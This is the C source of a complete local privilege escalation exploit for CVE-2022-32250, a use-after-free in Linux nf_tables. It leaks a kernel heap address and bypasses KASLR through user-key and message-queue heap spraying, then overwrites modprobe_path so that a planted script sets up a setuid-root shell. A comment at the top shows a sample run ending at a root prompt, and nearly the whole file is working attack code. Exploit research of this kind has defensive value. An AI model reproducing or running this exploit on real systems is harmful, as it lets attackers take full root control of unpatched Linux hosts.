exploit.c

/*
# ./exploit
[*] CVE-2022-32250 LPE Exploit by @YordanStoychev

[*] Setting up user+network namespace sandbox

[+] STAGE 1: Heap leak
[*] Socket is opened.
[*] Table table1 created.
[*] Socket is opened.
[*] Table table2 created.
[*] Socket is opened.
[*] Table table3 created.
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created
[&] heap_addr: 0xffff90d97f8a64d8

[+] STAGE 2: KASLR bypass
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created
[&] kaddr: 0xffffffffa754bef0
[&] kbase: 0xffffffffa7000000

[+] STAGE 3: modprobe_path overwrite
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created

[*] STAGE 4: Escalation
[*] Setting up the fake modprobe...
[*] modprobe_path: /tmp/ِprobe
[*] Setting up the shell...
[*] Triggering the modprobe...
[*] Executing shell...
/ #
*/


#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <netinet/in.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>
#include <libnftnl/set.h>


#include <time.h>
#include <stdlib.h>
#include <string.h>


#include <linux/limits.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

#include <pthread.h>
#include <inttypes.h>
#include <assert.h>

#include <sched.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdarg.h>

#include <sys/stat.h>        /* For mode constants */
#include <mqueue.h>

// create a table and a named set
// add once nft_lookup without STATEFUL flag so it is UAF'd
// allocate user_key_payload over it
// add another nft_lookup to the same table and named set

int set_num = 1;

static struct nftnl_table *table_add_parse(char* table_name, uint16_t family) {
	struct nftnl_table *t; // create struct
	t = nftnl_table_alloc(); // allocate the table
	if (t == NULL) {
		perror("[!] Couldn't allocate a table");
		exit(EXIT_FAILURE);
	}

	nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family); // set the family
	nftnl_table_set_str(t, NFTNL_TABLE_NAME, table_name); // set the name

	return t;
}

static struct nftnl_chain *chain_add_parse(char* table_name, char* chain_name, int hooknum)
{
	struct nftnl_chain *t;
	//int hooknum = NF_INET_LOCAL_OUT;

	t = nftnl_chain_alloc();
	if (t == NULL) {
		perror("[!] Couldn't allocate a chain");
		return NULL;
	}
	nftnl_chain_set_str(t, NFTNL_CHAIN_TABLE, table_name);
	nftnl_chain_set_str(t, NFTNL_CHAIN_NAME, chain_name);
	nftnl_chain_set_u32(t, NFTNL_CHAIN_PRIO, 0); // set priority to 0
	nftnl_chain_set_u32(t, NFTNL_CHAIN_HOOKNUM, hooknum);
	return t;
}


void setup_table_and_chain(char* table_name, char* base_chain_name, int hooknum){
	char buf_table[MNL_SOCKET_BUFFER_SIZE];
	struct nlmsghdr *nlh; // netlink message header
	uint32_t portid, t_seq, table_seq;
	uint16_t family = AF_INET;
	struct nftnl_table *t_table; // netfilter netlink table
	struct mnl_nlmsg_batch *batch_table;
	int ret;


	// **** TABLE SETUP ****

	t_table = table_add_parse(table_name, family); // the table
	t_seq = time(NULL); // t sequence num
	batch_table = mnl_nlmsg_batch_start(buf_table, sizeof(buf_table)); // starts a batch of messages
	nftnl_batch_begin(mnl_nlmsg_batch_current(batch_table), t_seq++); // 'begins' the batch

	mnl_nlmsg_batch_next(batch_table); // denominates that a new message starts
	table_seq = t_seq;
	family = nftnl_table_get_u32(t_table, NFTNL_TABLE_FAMILY); // get the family back?
	nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch_table), // build the netlink header
					NFT_MSG_NEWTABLE, family,
					NLM_F_CREATE|NLM_F_ACK, t_seq++);
	nftnl_table_nlmsg_build_payload(nlh, t_table); // build the payload
	nftnl_table_free(t_table); // free the allocated table
	mnl_nlmsg_batch_next(batch_table); // denominates that a new message can start

	nftnl_batch_end(mnl_nlmsg_batch_current(batch_table), t_seq++); // ends the nftnl batch section
	mnl_nlmsg_batch_next(batch_table);


	// *** SETTING UP THE SOCKET ***
 	struct mnl_socket* nl_soc = mnl_socket_open(NETLINK_NETFILTER); // netlink socket
	if(nl_soc == NULL){
		perror("[!] mnl_socket_open");
		exit(EXIT_FAILURE);
	}


	if(mnl_socket_bind(nl_soc, 0, MNL_SOCKET_AUTOPID) < 0){ // attempt to bind
		perror("[!] mnl_socket_bind");
		exit(EXIT_FAILURE);
	}
	printf("[*] Socket is opened. \n");

	portid = mnl_socket_get_portid(nl_soc); // gets the portid

	// *** SENDING TABLE BATCH ***
	if (mnl_socket_sendto(nl_soc, mnl_nlmsg_batch_head(batch_table),
			      mnl_nlmsg_batch_size(batch_table)) < 0) {
		perror("[!] mnl_socket_send *table*");
		exit(EXIT_FAILURE);
	}
	mnl_nlmsg_batch_stop(batch_table); // stop the batch

	ret = mnl_socket_recvfrom(nl_soc, buf_table, sizeof(buf_table));
	while (ret > 0) {
		ret = mnl_cb_run(buf_table, ret, table_seq, portid, NULL, NULL);
		if (ret <= 0)
			break;
		ret = mnl_socket_recvfrom(nl_soc, buf_table, sizeof(buf_table));
	}

	if (ret == -1) {
		perror("[!] Error adding table");
		exit(EXIT_FAILURE);
	}
	printf("[*] Table %s created. \n", table_name);


	mnl_socket_close(nl_soc);
}

static struct nftnl_set *setup_set(uint8_t family, const char *table,
				 const char *name)
{
	struct nftnl_set *s = NULL;

	s = nftnl_set_alloc();
	if (s == NULL) {
		perror("OOM");
		exit(EXIT_FAILURE);
	}

	nftnl_set_set_str(s, NFTNL_SET_TABLE, table);
	nftnl_set_set_str(s, NFTNL_SET_NAME, name);
	nftnl_set_set_u32(s, NFTNL_SET_FAMILY, family);
	nftnl_set_set_u32(s, NFTNL_SET_FLAGS, NFT_SET_EXPR);
	nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, sizeof(uint16_t));
	/* inet service type, see nftables/include/datatypes.h */
	nftnl_set_set_u32(s, NFTNL_SET_KEY_TYPE, 13);
	nftnl_set_set_u32(s, NFTNL_SET_ID, set_num++);

	return s;
}

void add_set(char *table_name, char *set_name, uint8_t family) {
	struct mnl_socket *nl;
	struct nftnl_set *s;
	struct nlmsghdr *nlh;
	struct mnl_nlmsg_batch *batch;
	char buf[MNL_SOCKET_BUFFER_SIZE];
	uint32_t seq = time(NULL);
	int ret;


	s = setup_set(family, table_name, set_name);

	nl = mnl_socket_open(NETLINK_NETFILTER);
	if (nl == NULL) {
		perror("mnl_socket_open");
		exit(EXIT_FAILURE);
	}

	if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
		perror("mnl_socket_bind");
		exit(EXIT_FAILURE);
	}

	batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

	nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
	mnl_nlmsg_batch_next(batch);

	nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
				    NFT_MSG_NEWSET, family,
				    NLM_F_CREATE | NLM_F_ACK, seq++);

	nftnl_set_nlmsg_build_payload(nlh, s);
	nftnl_set_free(s);
	mnl_nlmsg_batch_next(batch);

	nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
	mnl_nlmsg_batch_next(batch);

	ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
				mnl_nlmsg_batch_size(batch));
	if (ret == -1) {
		perror("mnl_socket_sendto");
		exit(EXIT_FAILURE);
	}

	mnl_nlmsg_batch_stop(batch);

	ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));
	if (ret == -1) {
		perror("mnl_socket_recvfrom");
		exit(EXIT_FAILURE);
	}

	ret = mnl_cb_run(buf, ret, 0, mnl_socket_get_portid(nl), NULL, NULL);
	if (ret < 0) {
		perror("mnl_cb_run");
		exit(EXIT_FAILURE);
	}

	printf("[*] Set created \n");

	mnl_socket_close(nl);

}



void trigger_uaf(uint8_t family, char* table_name, const char *set, const char *throaway_name){
	// set here is the persistant set
	// throaway is the one that triggers the Use-After-Free
	struct mnl_socket *nl;
	struct nftnl_set *throwaway;
	struct nlmsghdr *nlh;
	struct mnl_nlmsg_batch *batch;
	char buf[MNL_SOCKET_BUFFER_SIZE];
	uint32_t seq = time(NULL);
	int ret;

	throwaway = setup_set(family, table_name, throaway_name);

	struct nftnl_expr* e;
	e = nftnl_expr_alloc("lookup");

	nftnl_expr_set_str(e, NFTNL_EXPR_LOOKUP_SET, set);
	nftnl_expr_set_u32(e, NFTNL_EXPR_LOOKUP_SREG, NFT_REG32_05);

	nftnl_set_add_expr(throwaway, e);

	nl = mnl_socket_open(NETLINK_NETFILTER);
	if (nl == NULL) {
		perror("mnl_socket_open");
		exit(EXIT_FAILURE);
	}

	if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
		perror("mnl_socket_bind");
		exit(EXIT_FAILURE);
	}

	batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

	nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
	mnl_nlmsg_batch_next(batch);

	nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
				    NFT_MSG_NEWSET, family,
				    NLM_F_CREATE | NLM_F_ACK, seq++);

	nftnl_set_nlmsg_build_payload(nlh, throwaway);
	nftnl_set_free(throwaway);
	mnl_nlmsg_batch_next(batch);

	nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
	mnl_nlmsg_batch_next(batch);

	ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
				mnl_nlmsg_batch_size(batch));
	if (ret == -1) {
		perror("mnl_socket_sendto");
		exit(EXIT_FAILURE);
	}

	mnl_nlmsg_batch_stop(batch);

	ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));
	if (ret == -1) {
		perror("mnl_socket_recvfrom");
		exit(EXIT_FAILURE);
	}

	ret = mnl_cb_run(buf, ret, 0, mnl_socket_get_portid(nl), NULL, NULL);
	if (ret < 0) {
		printf("[*] Set with UAF'd expression created \n");
	}


	mnl_socket_close(nl);
}
typedef int32_t key_serial_t;


key_serial_t forge_user_key_payload(const char *description, size_t plen){

	char payload[plen];
	sprintf(payload, "Some payload");
 	return syscall(__NR_add_key,
		       "user", description, payload, plen, -4);

}

key_serial_t forge_user_key_payload_kaslr(const char *description, size_t plen, uint64_t addr){

	char payload[plen];
	char x[8] = "12345678";
	uint64_t msg_len = 0x8;
	memcpy(payload, &addr, 8);
	memcpy((payload+0x8), &addr, 8);
	memcpy((payload+0x10), x, 8);
	memcpy((payload+0x18), &msg_len, 8);
 	return syscall(__NR_add_key,
		       "user", description, payload, plen, -4);

}


key_serial_t forge_user_key_payload_modprobe(const char *description, size_t plen,
		uint64_t modprobe_path, uint64_t path){

	char payload[plen];
	char x[8] = "12345678";
	uint64_t msg_len = 0x8;
	memcpy(payload, &modprobe_path, 8);
	memcpy((payload+0x8), &path, 8);
	memcpy((payload+0x10), x, 8);
	memcpy((payload+0x18), &msg_len, 8);
 	return syscall(__NR_add_key,
		       "user", description, payload, plen, -4);

}

// key_serial_t* spray_user_key_payload(int amount){

// }


static inline long __keyctl(int cmd,
			    unsigned long arg2,
			    unsigned long arg3,
			    unsigned long arg4,
			    unsigned long arg5)
{
	return syscall(__NR_keyctl,
		       cmd, arg2, arg3, arg4, arg5);
}

long keyctl(int cmd, ...)
{
	va_list va;
	unsigned long arg2, arg3, arg4, arg5;

	va_start(va, cmd);
	arg2 = va_arg(va, unsigned long);
	arg3 = va_arg(va, unsigned long);
	arg4 = va_arg(va, unsigned long);
	arg5 = va_arg(va, unsigned long);
	va_end(va);

	return __keyctl(cmd, arg2, arg3, arg4, arg5);
}

long keyctl_read(key_serial_t id, char *buffer, size_t buflen)
{
	return keyctl(11, id, buffer, buflen);
}

int keyctl_read_alloc(key_serial_t id, void **_buffer)
{
	char *buf;
	long buflen, ret;

	ret = keyctl_read(id, NULL, 0);
	if (ret < 0)
		return -1;

	for (;;) {
		buflen = ret;
		buf = malloc(buflen + 1);
		if (!buf)
			return -1;

		ret = keyctl_read(id, buf, buflen);
		if (ret < 0) {
			free(buf);
			return -1;
		}

		if (buflen >= ret)
			break;
		free(buf);
	}

	buf[ret] = 0;
	*_buffer = buf;
	return ret;
}

mqd_t open_mqueue(char* name){ // we intiate a message queue to allocate a posix_msg_tree_node
	mqd_t ret = mq_open(name, O_RDWR | O_CREAT, S_IRWXU | S_IRWXO | S_IRWXG, NULL);
	if(ret == -1){
		perror("[!] mq_open");
		exit(EXIT_FAILURE);
	}
	return ret;
}

void spray_messages(mqd_t mqdes, int amount){
	char* message = "ABCDEFGH";
	for(int i = 0; i<amount; i++){
		int ret = mq_send(mqdes, message, sizeof(message), 1);
		if(ret == -1){
			perror("[!] mq_send");
			exit(EXIT_FAILURE);
		}
	}
}

// kmalloc-128 allocation (might also go to kmalloc-96 but we don't care)
// as long as it isn't kmalloc-64 its fine for us
void spray_messages_128(mqd_t mqdes, int amount){
	char message[] = "ABCDAAAAAAAAAAAAAAAAAAAA"; // 24 byte payload should be more than enough
	// msg_msg header is supposed to be 48 bytes
	for(int i = 0; i<amount; i++){
		int ret = mq_send(mqdes, message, sizeof(message), 1);
		if(ret == -1){
			perror("[!] mq_send");
			exit(EXIT_FAILURE);
		}
	}
}

int global_payload_counter = 0;

key_serial_t* spray_user_key_payload(int amount){
	key_serial_t* arr = malloc(sizeof(key_serial_t)*amount);
	char desc[256];
	for(int i = 0; i < amount; i++){
		sprintf(desc, "random description %d", global_payload_counter + i);
		// puts(desc);
		key_serial_t key = forge_user_key_payload(desc, 32);
		*(arr + sizeof(key_serial_t)*i) = key;
	}
	global_payload_counter += amount;
	return arr;
}

long keyctl_revoke(key_serial_t id)
{
	return keyctl(3, id);
}

// amount / rate must always be a whole number
key_serial_t* free_keys(key_serial_t* keys, int amount, int rate){
	key_serial_t* arr = malloc(sizeof(key_serial_t)*(amount/rate));
	for(int i = 0; i < amount; i++){
		if (i % rate == 0){
			keyctl_revoke(keys + sizeof(key_serial_t)*i);
		}
		else {
			*(arr + sizeof(key_serial_t)*(i/rate)) = *(keys+sizeof(key_serial_t)*i);
		}
	}
	free(keys);
	return arr;
}


#define DEFAULT_MAX_MSG_SIZE 8192

uint64_t recv_msg_addr(mqd_t mqdes){
	char *buffer = malloc(DEFAULT_MAX_MSG_SIZE); // 8192 is the default max msgsize
	mq_receive(mqdes, buffer, DEFAULT_MAX_MSG_SIZE, 0);
	uint64_t kaddr = 0;
	memcpy(&kaddr, buffer, 8);
	return kaddr;
}

void write_to_file(const char *which, const char *format, ...) {
  FILE * fu = fopen(which, "w");
  va_list args;
  va_start(args, format);
  if (vfprintf(fu, format, args) < 0) {
    perror("cannot write");
    exit(1);
  }
  fclose(fu);
}


// int kaslr_successful = 0;
// key_serial_t kaslr_key;

// void read_key_loop(){
// 	while(!kaslr_successful){
// 		void* buffer;
// 		int x = keyctl_read_alloc(kaslr_key, &buffer);
// 		usleep(5);
// 	}
// }

// void write_key_loop() {
// 	while(!kaslr_successful){
// 		void* buffer;
// 		int x = keyctl_read_alloc(kaslr_key, &buffer);
// 		usleep(5);
// 	}
// }

// we want to update the keys outside of kmalloc-64
// if it is in kmalloc-64 they would be reallocated over the locations of the previous ones
void update_keys(int amount){
	for(int i = 0; i < amount; i++){
		char desc[256];
		sprintf(desc, "random description %d", i);
		int plen = 30;
		char payload[plen]; 
		memset(payload, 0x41, 30);
		syscall(__NR_add_key,
			"user", desc, payload, plen, -4);
	}
}


void setup_namespaces(void) {
	uid_t uid = getuid();
	gid_t gid = getgid();

	if (unshare(CLONE_NEWUSER) < 0) {
		perror("[-] unshare(CLONE_NEWUSER)");
		exit(EXIT_FAILURE);
	}
	if (unshare(CLONE_NEWNET) < 0) {
		perror("[-] unshare(CLONE_NEWNET)");
		exit(EXIT_FAILURE);
	}

	if (unshare(CLONE_NEWCGROUP) < 0){
		perror("[-] unshare(CLONE_NEWCGROUP)");
		exit(EXIT_FAILURE);
	}

	cpu_set_t set;
	CPU_ZERO(&set);
	CPU_SET(0, &set);
	if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
		perror("[-] sched_setaffinity");
		exit(EXIT_FAILURE);
	}

	// now we map uid and gid
	write_to_file("/proc/self/uid_map", "0 %d 1", uid);
	// deny setgroups (see user_namespaces(7))
	write_to_file("/proc/self/setgroups", "deny");
	// remap gid
	write_to_file("/proc/self/gid_map", "0 %d 1", gid);

}


void setup_fake_modprobe(){
	char path[16] = {0};
	int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
	read(fd, path, 14); // we cut at 14 bytes because the last two bytes are \n and 00
	close(fd);

	printf("[*] modprobe_path: %s\n", path);

	//char fake_modprobe[] = "#!/bin/sh\n\nchown root:root /tmp/final\nchmod 4555 /tmp/final\n"; 
	char fake_modprobe[] = "#!/bin/sh\n\nchown root:root /final\nchmod 4555 /final\n"; 

	fd = open(path, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);
	write(fd, fake_modprobe, strlen(fake_modprobe));
	close(fd);
}

void setup_shell(){

	char shell[] = "int main() { setuid(0); setgid(0); system(\"/bin/sh\"); return 0; }";

	int fd = open("/tmp/final.c", O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);
	write(fd, shell, strlen(shell)); // it is 37 bytes
	close(fd);
	//system("gcc /tmp/final.c -w -o final");
}

void execute_shell(){
	//execve("/tmp/final", NULL, NULL);
	execve("/final", NULL, NULL);
}

void trigger_modprobe(){
	char* trigger_sequence = "\xff\xff\xff\xff";
	int fd = open("/tmp/trigger", O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);
	write(fd, trigger_sequence, 4);
	close(fd);

	execve("/tmp/trigger", NULL, NULL);
}


#define USER_FREE_PAYLOAD_RCU 0x54bef0
#define MODPROBE_PATH 0x185fa80

int main() {

	int *semaphore = mmap(NULL, sizeof(int), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
	*semaphore = 1;

	/* we need to fork because the main process will be dropped into */
	/* user+net namespace */
	if(fork()) { 
		while(*semaphore);
	
		// this stage will be triggered last
		// now we abuse the modprobe overwrite
		// first create the fake modprobe
		// then attempt to execute a file that will trigger a modprobe check
		// the fake modprobe will change the permissions of a file that will gives us a shell
		// we then execute the shell
		printf("\n[*] STAGE 4: Escalation\n");
		printf("[*] Setting up the fake modprobe...\n");
		setup_fake_modprobe();
		printf("[*] Setting up the shell...\n");
		setup_shell();
		printf("[*] Triggering the modprobe...\n");
		trigger_modprobe();
		printf("[*] Executing shell...\n");
		execute_shell();
	}

	uint32_t family = AF_INET;
	printf("[*] CVE-2022-32250 LPE Exploit by @YordanStoychev \n\n");
	system("id");
	printf("[*] Setting up user+network namespace sandbox \n\n");
	setup_namespaces();
	system("id");

	char *table1 = "table1";
	char *chain1 = "chain1";
	char *set1 = "set1";

	mqd_t kaslr_queue = open_mqueue("/kaslr");

	printf("\n[+] STAGE 1: Heap leak\n");
	setup_table_and_chain(table1, chain1, NF_INET_LOCAL_OUT);
	setup_table_and_chain("table2", chain1, NF_INET_LOCAL_OUT);
	setup_table_and_chain("table3", chain1, NF_INET_LOCAL_OUT);
	add_set(table1, set1, NFPROTO_IPV4);
	trigger_uaf(family, table1, set1, "th1");
	key_serial_t leak_key = forge_user_key_payload("key1", 31);
	trigger_uaf(family, table1, set1, "th2");
	void* buffer;
	int x = keyctl_read_alloc(leak_key, &buffer);
	uint64_t heap_addr;
	memcpy(&heap_addr, buffer, 8);
	printf("[&] heap_addr: 0x%" PRIx64 " \n", heap_addr);
	uint64_t heap_base = heap_addr & 0xffffffff00000000;

	// KASLR leaking phase
	printf("\n[+] STAGE 2: KASLR bypass\n");
	char *persistant_kaslr_set = "kaslr_set";
	char *persistant_mp_set = "modprobe_set";

	add_set("table2", persistant_kaslr_set, NFPROTO_IPV4);

	// allocating a posix_msg_tree_node
	trigger_uaf(family, "table2", persistant_kaslr_set, "th3");
	spray_messages_128(kaslr_queue, 1);

	// spray a bunch of keys to maximize our chance of success
	key_serial_t* garbage_keys = spray_user_key_payload(180);
	// now we free some keys so we can allocate the kaslr key on one of their places
	garbage_keys = free_keys(garbage_keys, 180, 90); // we free every 90th key
	// NOTE: max_keys are 200 for non-root user; if you exceed it - it will overwrite old ones

	// allocating a user_key_payload
	// it is going to be treated as the first message in message queue
	trigger_uaf(family, "table2", persistant_kaslr_set, "th4");
	forge_user_key_payload_kaslr("kaslr_key", 32, heap_addr);

	update_keys(180); // we start to update the keys to populate rcu_head->func
	uint64_t kaddr = recv_msg_addr(kaslr_queue);
	if(kaddr & 0xffffffff00000000 == 0xffffffff00000000){
		puts("[!] Couldn't leak KASLR.");
		exit(EXIT_FAILURE);
	}
	uint64_t kbase = kaddr - USER_FREE_PAYLOAD_RCU;
	free_keys(garbage_keys, 178, 1); // rate = 1 free all remaining keys
	global_payload_counter = 0;
	printf("[&] kaddr: 0x%" PRIx64 " \n", kaddr);
	printf("[&] kbase: 0x%" PRIx64 " \n", kbase);

	// NOTE: the KASLR leak on top relies that recv_msg_add will be executed before
	// the rcu callback of user_key_payload is executed
	// if this does not happen in this order the exploit will fail as the user_key_payload
	// would be zeroed out

	// MODPROBE_PATH OVERWRITE STAGE
	printf("\n[+] STAGE 3: modprobe_path overwrite\n");
	add_set("table3", persistant_mp_set, NFPROTO_IPV4);
	mqd_t modprobe_queue = open_mqueue("/modprobe");
	uint64_t modprobe_path = kbase + MODPROBE_PATH;


	trigger_uaf(family, "table3", persistant_mp_set, "th4");
	spray_messages_128(modprobe_queue, 1); // should put a posix tree node there

	// we need to allocate some user_key_payloads to satisfy the *security condition
	// of the message subsystem (*security must be a valid pointer)
	garbage_keys = spray_user_key_payload(180);
	garbage_keys = free_keys(garbage_keys, 180, 90); // we free every 40th key
	trigger_uaf(family, "table3", persistant_mp_set, "th5"); 
	uint64_t mp_addr = heap_base + 0x2f706d74; // 0x2f706d74 = tmp/ (but little endian)
	forge_user_key_payload_modprobe("modprobe_key", 32, modprobe_path-0x7, mp_addr); 
	// here it was -0x7 because -0x8 due to list unlinking and +0x1 to keep the "/" in the path
	update_keys(180);
	uint64_t recv = recv_msg_addr(modprobe_queue); // just receive a msg so it gets removed 

	// this should have triggered the modprobe overwrite

	free_keys(garbage_keys, 178, 1); // rate = 1 free all remaining keys
	*semaphore = 0; // unlocks the final stage

	return 0;
}